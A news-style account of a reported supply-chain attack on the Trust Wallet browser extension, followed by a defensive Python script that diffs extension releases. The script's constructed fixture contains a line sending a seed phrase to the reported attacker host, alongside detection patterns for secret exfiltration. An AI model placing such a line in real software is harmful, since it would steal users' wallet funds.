On December 25, multiple cryptocurrency users reported rapid, unauthorized withdrawals from their Trust Wallet browser extension, prompting an immediate community alert. Initial reports surfaced via on-chain investigator ZachXBT, who flagged hundreds of compromised addresses across EVM-compatible chains, Bitcoin, and Solana within a two-hour window. The sudden surge in reported losses—initially estimated at over $6 million—triggered urgent warnings on Telegram and X, urging all users to revoke approvals and withdraw funds.
Community researchers quickly identified the Trust Wallet Chrome extension version 2.68 as a common denominator. Investigation of the extension’s JavaScript files revealed unexplained additions in “4482.js” that were absent from official release notes. Suspicious code segments masked as analytics functions were, in fact, capable of capturing seed phrases, relaying them to metrics-trustwallet[.]com, and then draining wallets automatically upon phrase import. The malicious payload activated only for wallet-import events, evading early detection.
Subsequent follow-the-chain analysis traced over $6 million in stolen assets funnelled through privacy mixers and obfuscation services, highlighting the attackers’ intent to launder funds swiftly. Victim addresses spanned insider multisig accounts, high-value individual wallets, and small retail traders alike, underscoring the vulnerability of browser-based wallets to supply-chain attacks. Peel transactions from major mixers such as Tornado Cash and Wasabi Wallet were also observed, indicating coordinated laundering strategies.
Following public scrutiny, Trust Wallet issued an official advisory acknowledging a security incident affecting only extension version 2.68. The advisory recommended immediate disabling of the extension, upgrading to version 2.69 from the official Chrome Web Store, and avoiding seed phrase imports into browser environments. Mobile and non-Chrome users were reported to be unaffected. Trust Wallet emphasized that the breach did not compromise its core mobile app or on-chain smart contracts.
The incident reignited debate around self-custody risks and operational security. Experts reiterated that key management environments are as critical as cryptographic protocols, and that supply-chain integrity must be enforced by both wallet providers and browser marketplaces. As an immediate precaution, security researchers advised affected users to migrate remaining assets to fresh wallets created on secure, air-gapped devices, revoke all dApp approvals, and monitor network activity for suspicious interactions.
In the wake of the attack, calls for standardized extension vetting, transparent change logs, and independent audits have grown louder. Blockchain security firms and open-source auditor groups are collaborating on tools to detect anomalous client-side code in popular wallet extensions. For now, the Trust Wallet incident stands as a stark example of how supply-chain vulnerabilities can undermine the promise of self-sovereign asset control, urging the community to prioritize end-to-end security in wallet design and distribution.
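The detection approach alluded to above (spotting unexplained file additions such as the "4482.js" described earlier, and anomalous client-side code in wallet extensions generally) can be prototyped with a release-diffing audit. The following is an added example written for this article, not code from Trust Wallet or any auditor group. It assumes two unpacked extension releases on disk, a short allowlist of hosts the extension legitimately contacts (the allowlist entry `api.example-wallet.invalid` is constructed), and it uses the host named in the incident reports as its one known-bad indicator. The sample "releases" it builds are constructed fixtures, not real extension code.

```python
"""Diff two unpacked browser-extension releases and flag risky changes.

Added example, not the wallet vendor's code. Assumptions: releases are plain
directories; ALLOWED_HOSTS is the operator's own allowlist; sample files are
constructed in a temp directory so the script runs offline.
"""
import hashlib
import re
import tempfile
from pathlib import Path

ALLOWED_HOSTS = {"api.example-wallet.invalid"}  # assumed allowlist (constructed)
KNOWN_BAD_HOSTS = {"metrics-trustwallet.com"}   # exfiltration host reported for the 2.68 incident

HOST_RE = re.compile(r"https?://([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")
SECRET_RE = re.compile(r"mnemonic|seed[_ ]?phrase|private[_ ]?key", re.I)
SEND_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon|WebSocket)\b")


def file_hashes(root: Path) -> dict[str, str]:
    """Map each file path (relative to root) to its SHA-256 hex digest."""
    return {
        str(p.relative_to(root)).replace("\\", "/"): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def diff_releases(old: Path, new: Path) -> dict[str, list[str]]:
    """Classify files as added, removed or changed between two unpacked releases."""
    a, b = file_hashes(old), file_hashes(new)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "changed": sorted(k for k in a.keys() & b.keys() if a[k] != b[k]),
    }


def scan_js(text: str) -> dict:
    """Extract contacted hosts and flag secret handling paired with a network send."""
    hosts = set(HOST_RE.findall(text))
    return {
        "unknown_hosts": sorted(hosts - ALLOWED_HOSTS),
        "known_bad_hosts": sorted(hosts & KNOWN_BAD_HOSTS),
        "secret_exfil_pattern": bool(SECRET_RE.search(text) and SEND_RE.search(text)),
    }


def audit(old: Path, new: Path) -> list[dict]:
    """Return one finding per added or changed JS file that trips any check."""
    findings = []
    d = diff_releases(old, new)
    for rel in d["added"] + d["changed"]:
        if not rel.endswith(".js"):
            continue
        result = scan_js((new / rel).read_text())
        if result["unknown_hosts"] or result["known_bad_hosts"] or result["secret_exfil_pattern"]:
            findings.append({"file": rel, "status": "added" if rel in d["added"] else "changed", **result})
    return findings


def build_sample() -> tuple[Path, Path]:
    """Write two constructed mini-releases to a temp dir (fixtures, not real extension code)."""
    base = Path(tempfile.mkdtemp())
    old, new = base / "2.67", base / "2.68"
    common = {"popup.js": 'fetch("https://api.example-wallet.invalid/prices");\n'}
    old_files = {**common, "manifest.json": '{"version": "2.67"}\n',
                 "background.js": 'console.log("bg v1");\n'}
    new_files = {
        **common,
        "manifest.json": '{"version": "2.68"}\n',
        "background.js": 'console.log("bg v2");\n',  # benign change, must not be flagged
        # Constructed stand-in for the unexplained "analytics" file the article describes:
        # it touches the seed phrase and sends it to a host outside the allowlist.
        "4482.js": (
            "// analytics\n"
            "function onImport(seedPhrase) {\n"
            '  navigator.sendBeacon("https://metrics-trustwallet.com/collect", seedPhrase);\n'
            "}\n"
        ),
    }
    for root, files in ((old, old_files), (new, new_files)):
        root.mkdir(parents=True)
        for name, body in files.items():
            (root / name).write_text(body)
    return old, new


if __name__ == "__main__":
    old_dir, new_dir = build_sample()
    print("diff:", diff_releases(old_dir, new_dir))
    for finding in audit(old_dir, new_dir):
        print("FLAG", finding)
```

Run it as-is to see the constructed 2.68 fixture flagged on all three checks (new file, host outside the allowlist, secret-plus-send pattern) while the benign `background.js` change passes. On a real release the hash diff is the part to trust most: any file missing from the release notes deserves a manual read, and the regex checks are only a cheap first pass that a minifier or string-splitting can defeat, which is why the host allowlist should also be enforced at the network layer rather than in source review alone.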